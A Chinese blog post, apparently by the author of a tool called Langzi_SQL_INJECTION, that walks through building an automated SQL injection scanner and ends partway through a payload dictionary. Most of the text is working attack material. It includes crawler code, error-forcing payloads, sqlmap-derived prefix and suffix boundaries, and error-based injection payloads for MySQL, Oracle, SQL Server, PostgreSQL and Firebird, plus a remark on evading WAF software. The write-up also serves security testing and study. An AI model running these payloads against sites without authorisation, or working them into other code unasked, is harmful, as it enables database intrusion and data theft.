人海中偶尔有个背影让你觉得很眼熟,你不顾一切的奔过去,等那人转过头来,却是一张陌生的脸。
原始版本 1.0
流程图
首先需要爬行该网站,获取到网站链接,然后再对这些链接进行检测,最后结果保存在本地。
工程设计
爬行链接
惭愧,并没有用详细的正则表达式专门提取链接。使用的是寻找Href的值,然后剖去http与javascript。将爬行的结果保存在列表,因为可能一次性可能爬很多的链接,没有必要检测这么多的链接,所以最后做了一些筛选,只随机选择5个链接进行检测。
r_sql = re.findall('href="(.*?)"', r_crawl.content)
list_none = []
for sql_sql in r_sql:
if 'php?' in sql_sql:
if not 'http' in sql_sql and not 'jsvascript' in sql_sql:
list_none.append(url + '/' + sql_sql.lstrip('/'))
else:
pass
else:
pass
同理把php换成asp,aspx等就能爬行asp,aspx的链接。
验证注入
思路是加上一些让能让数据库报错的东西,比如单引号,and1=2这样的。然后在链接上加上这些payloads,根据返回的页面是否有数据库报错语句。
SQL Payloads
payloads = ("'", "')", "';", '"', '")', '";',"--","-0",") AND 1998=1532 AND (5526=5526"," AND 5434=5692%23"," %' AND 5268=2356 AND '%'='"," ') AND 6103=4103 AND ('vPKl'='vPKl"," ' AND 7738=8291 AND 'UFqV'='UFqV",'`', '`)', '`;', '\\', "%27", "%%2727", "%25%27", "%60", "%5C")
数据库报错语句
sql_errors = {'SQL syntax':'mysql','syntax to use near':'mysql','MySQLSyntaxErrorException':'mysql','valid MySQL result':'mysql',
'Access Database Engine':'Access','JET Database Engine':'Access','Microsoft Access Driver':'Access',
'SQLServerException':'mssql','SqlException':'mssql','SQLServer JDBC Driver':'mssql','Incorrect syntax':'mssql',
'MySQL Query fail':'mysql'
}
后面的就很好理解了,在爬行到的链接加上验证的payload,然后在返回的页面判断是否出现了数据库报错的语句,通过这种方式判断是否有注入。
优化
的确是很粗糙啦,市面上大部分扫描注入的扫描器基本上都是这种思路。性能优化有几点,以后在写…
- 采集链接的时候还要深入二级目录下面采集,更加全面
- 注入的Payload可以用||1=1这样,绕过安全狗之类的软件检测注入
- 注入方式使用盲注检测
- 美观的输出显示
- 详细的注入过程
Langzi_SQL_INJECTION_2.0
简介
其实以前一直想移植sqlmap的检测注入功能,但是太多的事情耽搁迟迟没有动手,最近为了完善Langzi_Api不得不提前着手阅读sqlmap源码移植功能,在以前的文章说过sqlmap检测注入有5种方法,依次判断注入点,通过查看sqlmap目录下的文件很容易就找到注入的payload,使用正则把他们提取出来,然后加上验证即可。
检测方式
sqlmap有5中检测注入方式,排除了U 联合查询注入,S 多语句查询注入,T 基于时间盲注。
联合查询注入值截取了前面部分的payload检测方式。
保留E 错误型注入和B 布尔型注入。
然后在自定义一些注释符想让页面强制报错,完善部分。
获取前后缀拼接在注入链接前后,中间加载payload,发起网络请求,对于报错类型的对结果进行正则匹配,对盲注类型的对返回页面进行相似度判断。
联合查询有些复杂和基于时间盲注比较耗时,这里不提取验证了。
前后缀
首先前后缀,请求判断方式为
注入链接:url+前缀+payload+后缀
发起网络请求
根据返回结果判断
基于错误型的注入根据结果正则匹配就行,基于bool类型的要判断页面相似度。获取相似度使用difflib库。
获取sqlmap前后缀来源于:
sqlmap\boundaries.xml
用正则提取出来,保存前后缀的字典
'''
前缀与后缀
需要获取5个对象
RADNSTR # 随机字符串 4字节
RANDNUM # 随机数字 随便
RANDSTR1# 随机字符串 4字节后面修改
RANDSTR2# 同上
ORIGINAL# 获取url中的传递参数值
'''
pre_suf = {
'pre_suf_1': {'prefix': ')',
'suffix': '('},
'pre_suf_2': {'prefix': '))',
'suffix': '(('},
'pre_suf_3': {'prefix': "')",
'suffix': "('"},
'pre_suf_4': {'prefix': '"',
'suffix': '"'},
'pre_suf_5': {'prefix': "'",
'suffix': "'"},
'pre_suf_6': {'prefix': '")',
'suffix': '("'},
'pre_suf_7': {'prefix': ')"',
'suffix': '"('},
'pre_suf_8': {'prefix': ")'",
'suffix': "('"},
'pre_suf_9': {'prefix': ')))',
'suffix': '((('},
'pre_suf_10': {'prefix': ')',
'suffix': '%23'},
'pre_suf_11': {'prefix': ')',
'suffix': '--+'},
'pre_suf_12': {'prefix': "')",
'suffix': '%23'},
'pre_suf_13': {'prefix': "')",
'suffix': '--+'},
'pre_suf_14': {'prefix': '"',
'suffix': '%23'},
'pre_suf_15': {'prefix': '"',
'suffix': '--+'},
'pre_suf_16': {'prefix': "'",
'suffix': "--+"},
'pre_suf_17': {'prefix': ')',
'suffix': ' AND ([RANDNUM]=[RANDNUM]'},
'pre_suf_18': {'prefix': '))',
'suffix': ' AND (([RANDNUM]=[RANDNUM]'},
'pre_suf_19': {'prefix': ')))',
'suffix': '( AND ((([RANDNUM]=[RANDNUM]'},
'pre_suf_20': {'prefix': "')",
'suffix': " AND ('[RANDSTR]'='[RANDSTR]"},
'pre_suf_21': {'prefix': "'))",
'suffix': " AND (('[RANDSTR]'='[RANDSTR]"},
'pre_suf_22': {'prefix': "')))",
'suffix': " AND ((('[RANDSTR]'='[RANDSTR]"},
'pre_suf_23': {'prefix': "'",
'suffix': " AND '[RANDSTR]'='[RANDSTR]"},
'pre_suf_24': {'prefix': "')",
'suffix': " AND ('[RANDSTR]' LIKE '[RANDSTR]"},
'pre_suf_25': {'prefix': "'))",
'suffix': " AND (('[RANDSTR]' LIKE '[RANDSTR]"},
'pre_suf_26': {'prefix': "')))",
'suffix': " AND ((('[RANDSTR]' LIKE '[RANDSTR]"},
'pre_suf_27': {'prefix': '")',
'suffix': ' AND ("[RANDSTR]"="[RANDSTR]'},
'pre_suf_28': {'prefix': '"))',
'suffix': ' AND (("[RANDSTR]"="[RANDSTR]'},
'pre_suf_29': {'prefix': '")))',
'suffix': ' AND ((("[RANDSTR]"="[RANDSTR]'},
'pre_suf_30': {'prefix': '"',
'suffix': ' AND "[RANDSTR]"="[RANDSTR]'},
'pre_suf_31': {'prefix': '")',
'suffix': ' AND ("[RANDSTR]" LIKE "[RANDSTR]'},
'pre_suf_32': {'prefix': '"))',
'suffix': ' AND (("[RANDSTR]" LIKE "[RANDSTR]'},
'pre_suf_33': {'prefix': '")))',
'suffix': ' AND ((("[RANDSTR]" LIKE "[RANDSTR]'},
'pre_suf_34': {'prefix': '"',
'suffix': ' AND "[RANDSTR]" LIKE "[RANDSTR]'},
'pre_suf_35': {'prefix': ' ',
'suffix': '# [RANDSTR]'},
'pre_suf_36': {'prefix': ' ',
'suffix': '%23'},
'pre_suf_38': {'prefix': "'",
'suffix': " OR '[RANDSTR1]'='[RANDSTR2]"},
'pre_suf_39': {'prefix': "') WHERE [RANDNUM]=[RANDNUM]",
'suffix': '%23'},
'pre_suf_40': {'prefix': "') WHERE [RANDNUM]=[RANDNUM]",
'suffix': '--+'},
'pre_suf_41': {'prefix': '") WHERE [RANDNUM]=[RANDNUM]',
'suffix': '%23'},
'pre_suf_42': {'prefix': '") WHERE [RANDNUM]=[RANDNUM]',
'suffix': '--+'},
'pre_suf_43': {'prefix': ') WHERE [RANDNUM]=[RANDNUM]',
'suffix': '%23'},
'pre_suf_44': {'prefix': ') WHERE [RANDNUM]=[RANDNUM]',
'suffix': '--+'},
'pre_suf_45': {'prefix': "' WHERE [RANDNUM]=[RANDNUM]",
'suffix': '%23'},
'pre_suf_46': {'prefix': "' WHERE [RANDNUM]=[RANDNUM]",
'suffix': '--+'},
'pre_suf_47': {'prefix': '" WHERE [RANDNUM]=[RANDNUM]',
'suffix': '%23'},
'pre_suf_48': {'prefix': '" WHERE [RANDNUM]=[RANDNUM]',
'suffix': '--+'},
'pre_suf_49': {'prefix': ' WHERE [RANDNUM]=[RANDNUM]',
'suffix': '%23'},
'pre_suf_50': {'prefix': ' WHERE [RANDNUM]=[RANDNUM]',
'suffix': '--+'},
'pre_suf_51': {'prefix': "'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]",
'suffix': "||'"},
'pre_suf_52': {'prefix': "'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]",
'suffix': "||'"},
'pre_suf_53': {'prefix': "'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]",
'suffix': "+'"},
'pre_suf_54': {'prefix': "||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]",
'suffix': '||'},
'pre_suf_55': {'prefix': "||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]",
'suffix': '||'},
'pre_suf_56': {'prefix': '+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
'suffix': '+'},
'pre_suf_57': {'prefix': "+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]",
'suffix': '+'},
'pre_suf_58': {'prefix': "')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]",
'suffix': '%23'},
'pre_suf_59': {'prefix': "')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]",
'suffix': '--+'},
'pre_suf_60': {'prefix': '")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
'suffix': '%23'},
'pre_suf_61': {'prefix': '")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
'suffix': '--+'},
'pre_suf_62': {'prefix': ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
'suffix': '%23'},
'pre_suf_63': {'prefix': ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
'suffix': '--+'},
'pre_suf_64': {'prefix': "') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]",
'suffix': '%23'},
'pre_suf_65': {'prefix': "') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]",
'suffix': '--+'},
'pre_suf_66': {'prefix': '") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
'suffix': '%23'},
'pre_suf_67': {'prefix': '") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
'suffix': '--+'},
'pre_suf_68': {'prefix': ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
'suffix': '%23'},
'pre_suf_69': {'prefix': ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
'suffix': '--+'},
'pre_suf_70': {'prefix': '` WHERE [RANDNUM]=[RANDNUM]',
'suffix': '--+'},
'pre_suf_71': {'prefix': '` WHERE [RANDNUM]=[RANDNUM]',
'suffix': '%23'},
'pre_suf_72': {'prefix': '`) WHERE [RANDNUM]=[RANDNUM]',
'suffix': '%23'},
'pre_suf_73': {'prefix': '`) WHERE [RANDNUM]=[RANDNUM]',
'suffix': '--+'},
'pre_suf_74': {'prefix': '`=`[ORIGINAL]`',
'suffix': ' AND `[ORIGINAL]`=`[ORIGINAL]'},
'pre_suf_75': {'prefix': '"="[ORIGINAL]"',
'suffix': ' AND "[ORIGINAL]"="[ORIGINAL]'},
'pre_suf_76': {'prefix': ']-(SELECT 0 WHERE [RANDNUM]=[RANDNUM]',
'suffix': ')|[[ORIGINAL]'},
'pre_suf_77': {'prefix': "' IN BOOLEAN MODE)",
'suffix': '#'}
}
报错型
先看看让页面强制报错的部分payload,我做了一些整理但是可能还不完全。
level11_payloads = (
"'", "')", "';", '"', '")', '";', ' order By 500 ', "--", "-0", ") AND 1998=1532 AND (5526=5526", " AND 5434=5692%23",
" %' AND 5268=2356 AND '%'='", " ') AND 6103=4103 AND ('vPKl'='vPKl",
" ' AND 7738=8291 AND 'UFqV'='UFqV", '`', '`)', '`;', '\\', "%27", "%%2727", "%25%27", "%60", "%5C",
"'and (select 1 from (select count(*),concat(database(),':',floor(rand()*2)) as a from information_schema.tables group by a)as b limit 0,1)--+")
这个列表的内容为一些加载url后缀,如果没有waf拦截并且网址程序员没有做过滤的话,带入到数据库执行会报错,为了编码统一对这些后缀进行url编码。
from urlib import quote
level1_payloads = [quote(x) for x in level11_payloads]
如果页面报错了就会根据下面字典重的键与值进行正则匹配判断,报错内容来源于
sqlmap\xml\errors.xml
用正则提取出来报错的内容和对应的数据库类型,整合在一个字典中
sql_errors = {'SQL syntax': 'MYSQL',
'syntax to use near': 'MYSQL',
'MySQLSyntaxErrorException': 'MYSQL',
'valid MySQL result': 'MYSQL',
'SQL syntax.*?MySQL': 'MYSQL',
'Warning.*?mysql_': 'MYSQL',
'MySqlException \(0x': 'MYSQL',
"PostgreSQL.*?ERROR": "PostgreSQL",
"Warning.*?\Wpg_": "PostgreSQL",
"valid PostgreSQL result": "PostgreSQL",
"Npgsql\.": "PostgreSQL",
"PG::SyntaxError:": "PostgreSQL",
"org\.postgresql\.util\.PSQLException": "PostgreSQL",
"ERROR:\s\ssyntax error at or near": "PostgreSQL",
"Driver.*? SQL[\-\_\ ]*Server": "Microsoft SQL Server",
"OLE DB.*? SQL Server": "Microsoft SQL Server",
"SQL Server[^<"]+Driver": "Microsoft SQL Server",
"Warning.*?(mssql|sqlsrv)_": "Microsoft SQL Server",
"SQL Server[^<"]+[0-9a-fA-F]{8}": "Microsoft SQL Server",
"System\.Data\.SqlClient\.SqlException": "Microsoft SQL Server",
"(?s)Exception.*?\WRoadhouse\.Cms\.": "Microsoft SQL Server",
"Microsoft SQL Native Client error '[0-9a-fA-F]{8}": "Microsoft SQL Server",
"com\.microsoft\.sqlserver\.jdbc\.SQLServerException": "Microsoft SQL Server",
"ODBC SQL Server Driver": "Microsoft SQL Server",
"ODBC Driver \d+ for SQL Server": "Microsoft SQL Server",
"SQLServer JDBC Driver": "Microsoft SQL Server",
"macromedia\.jdbc\.sqlserver": "Microsoft SQL Server",
"com\.jnetdirect\.jsql": "Microsoft SQL Server",
"SQLSrvException": "Microsoft SQL Server",
"Microsoft Access (\d+ )?Driver": "Microsoft Access",
"JET Database Engine": "Microsoft Access",
"Access Database Engine": "Microsoft Access",
"ODBC Microsoft Access": "Microsoft Access",
"Syntax error \(missing operator\) in query expression": "Microsoft Access",
"ORA-\d{5}": "Oracle",
"Oracle error": "Oracle",
"Oracle.*?Driver": "Oracle",
"Warning.*?\Woci_": "Oracle",
"Warning.*?\Wora_": "Oracle",
"oracle\.jdbc\.driver": "Oracle",
"quoted string not properly terminated": "Oracle",
"SQL command not properly ended": "Oracle",
"DB2 SQL error": "CLI Driver.*?DB2",
"db2_\w+\(": "CLI Driver.*?DB2",
"SQLSTATE.+SQLCODE": "CLI Driver.*?DB2",
'check the manual that corresponds to your (MySQL|MariaDB) server version': 'MYSQL',
"Unknown column '[^ ]+' in 'field list'": 'MYSQL',
"MySqlClient\.": 'MYSQL',
'com\.mysql\.jdbc\.exceptions': 'MYSQL',
'Zend_Db_Statement_Mysqli_Exception': 'MYSQL',
'Access Database Engine': 'Microsoft Access',
'JET Database Engine': 'Microsoft Access',
'Microsoft Access Driver': 'Microsoft Access',
'SQLServerException': 'Microsoft SQL Server',
'SqlException': 'Microsoft SQL Server',
'SQLServer JDBC Driver': 'Microsoft SQL Server',
'Incorrect syntax': 'Microsoft SQL Server',
'MySQL Query fail': 'MYSQL',
'Unknown column.*?order clause': 'MYSQL'
}
这是我自己完善的第一步,第二步就是加载使用sqlmap的错误型注入payload,内容来源是:
sqlmap\payloads\error_based.xml
同样根据正则提取内容,保存在一个新的列表中,sqlmap的巧妙之处在于使用随机获取的参数进行验证
'''
需要一些特定的参数
DELIMITER_START # 随机字符作为开头
RANDNUM # 随机数字
DELIMITER_STOP # 随机字符作为结尾
RANDNUM1 # 随机数字+1
RANDNUM2 # 随机数字+2
RANDNUM3 # 随机数字+3
RANDNUM4 # 随机数字+4
RANDNUM5 # 随机数字+5
'''
error_base_injection = {
'INJPAY_27':
{'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))"},
'INJPAY_26':
{'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')"},
'INJPAY_25':
{'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')"},
'INJPAY_24':
{'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)"},
'INJPAY_23':
{'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)"},
'INJPAY_22':
{'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')"},
'INJPAY_21':
{'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " AND [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')"},
'INJPAY_20':
{'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))"},
'INJPAY_50':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " ,EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))"},
'INJPAY_29':
{'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))"},
'INJPAY_28':
{'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))"},
'INJPAY_51':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])"},
'INJPAY_38':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))"},
'INJPAY_39':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " (EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))"},
'INJPAY_55':
{'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " ,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))"},
'INJPAY_30':
{'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))"},
'INJPAY_31':
{'dbms': 'Firebird', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')"},
'INJPAY_32':
{'dbms': 'Firebird', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')"},
'INJPAY_33':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)"},
'INJPAY_34':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))"},
'INJPAY_35':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))"},
'INJPAY_36':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))"},
'INJPAY_37':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"},
'INJPAY_12':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)"},
'INJPAY_13':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)"},
'INJPAY_10':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])"},
'INJPAY_11':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])"},
'INJPAY_16':
{'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)"},
'INJPAY_17':
{'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))"},
'INJPAY_14':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)"},
'INJPAY_15':
{'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)"},
'INJPAY_18':
{'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))"},
'INJPAY_19':
{'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))"},
'INJPAY_52':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " ,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s)"},
'INJPAY_56':
{'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)"},
'INJPAY_57':
{'dbms': 'Firebird', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " ,(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))"},
'INJPAY_54':
{'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " ,(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))"},
'INJPAY_0':
{'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
'payload': " AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))"},
'INJPAY_1':
